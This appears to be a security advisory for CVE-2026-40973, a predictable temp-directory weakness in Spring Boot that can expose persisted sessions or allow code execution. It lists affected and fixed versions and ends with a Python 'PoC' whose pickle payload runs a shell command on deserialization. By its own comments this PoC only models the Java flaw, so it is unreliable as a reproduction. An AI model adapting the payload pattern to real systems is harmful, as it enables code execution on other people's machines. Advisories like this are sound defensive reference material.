Security Vulnerability Report
CVE-2026-40973 CVSS 7.0 HIGH


Published: 2026-04-28 00:16:24
Last Modified: 2026-04-30 14:25:37

Description

A local attacker on the same host as the application may be able to take control of the directory used by `ApplicationTemp`. When `server.servlet.session.persistent` is set to `true` and the attack persists across application restarts, this may allow the attacker to read session information and hijack authenticated users, or to deploy a gadget chain and execute code as the application's user.

Affected: Spring Boot 4.0.0–4.0.5 (fix 4.0.6), 3.5.0–3.5.13 (fix 3.5.14), 3.4.0–3.4.15 (fix 3.4.16), 3.3.0–3.3.18 (fix 3.3.19), 2.7.0–2.7.32 (fix 2.7.33). Root cause: predictable temp directory; the fix adds `ApplicationTemp` ownership verification. Versions that are no longer supported are also affected per the vendor advisory.

CVSS Details

CVSS Score
7.0
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
Weakness
CWE-377

Configurations (Affected Products)

cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:* - VULNERABLE - Spring Boot 4.0.0 - 4.0.5 (fixed in 4.0.6)
cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:* - VULNERABLE - Spring Boot 3.5.0 - 3.5.13 (fixed in 3.5.14)
cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:* - VULNERABLE - Spring Boot 3.4.0 - 3.4.15 (fixed in 3.4.16)
cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:* - VULNERABLE - Spring Boot 3.3.0 - 3.3.18 (fixed in 3.3.19)
cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:* - VULNERABLE - Spring Boot 2.7.0 - 2.7.32 (fixed in 2.7.33)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import os
import pickle

# Simulates an attacker pre-creating a "session" file in the predictable
# ApplicationTemp directory before the application (re)starts.
# Note: this simulation uses Python pickle; a real Spring Boot persistent
# session store uses Java serialization, so this file only models the idea.

# Path prediction (simplified for the PoC)
temp_dir = "/tmp/spring-boot-session-dir"
malicious_file = os.path.join(temp_dir, "session-123.ser")

# Ensure the directory exists (it is attacker-controlled in this scenario)
os.makedirs(temp_dir, exist_ok=True)


# Malicious payload (gadget chain placeholder)
class MaliciousPayload:
    def __reduce__(self):
        # Simulate command execution on deserialization
        return (os.system, ('touch /tmp/pwned',))


# Serialize the payload into the predicted session file
with open(malicious_file, 'wb') as f:
    pickle.dump(MaliciousPayload(), f)

print(f"[+] Malicious session file created at {malicious_file}")
print("[+] Waiting for application restart to trigger deserialization...")

References

https://spring.io/security/cve-2026-40973 (Vendor Advisory)
